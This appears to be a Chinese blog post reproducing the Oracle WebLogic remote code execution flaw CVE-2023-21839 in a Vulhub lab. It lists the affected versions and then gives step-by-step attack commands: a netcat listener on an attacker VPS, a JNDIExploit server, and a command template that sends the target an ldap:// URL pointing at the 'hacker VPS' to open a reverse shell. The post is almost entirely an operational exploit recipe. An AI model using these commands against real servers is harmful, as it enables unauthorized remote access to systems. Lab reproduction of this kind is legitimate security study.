CVE-2023-21839:Oracle WebLogic Server RCE

CVE-2023-21839允许远程用户在未经授权的情况下通过 IIOP/T3 进行 JNDI lookup 操作,当 JDK 版本过低或本地存在小工具(javaSerializedData)时,这可能会导致RCE漏洞。

》》》影响版本《《《

  • Weblogic 12.2.1.3.0
  • Weblogic 12.2.1.4.0
  • Weblogic 14.1.1.0.0
一:漏洞复现

步骤一:进入Vulhub对应的目录系下,启动容器并访问靶场...

#启动靶场
cd vulhub/weblogic/CVE-2023-21839
docker-compose build
docker-compose up -d
#访问靶场
http://ip:7001/

步骤二:在VSP上监听8080端口接收反弹过来的Shell并在VPS上运行JNDIExpLoit进行终端...

#端口监听
nc -l 8080

#JNDIExploit项目地址
https://github.com/WhiteHSBG/JNDIExploit

#JNDIExploit执行操作
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i vpsip

步骤三:在本地执行以下命令进行攻击

#攻击项目
https://github.com/DXask88MA/Weblogic-CVE-2023-21839

#命令模板
java -jar Weblogic-CVE-2023-21839.jar 目标IP地址:目标端口 ldap://黑客VPS地址:1389/Basic/ReverseShell/黑客VPS地址/监听端口

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值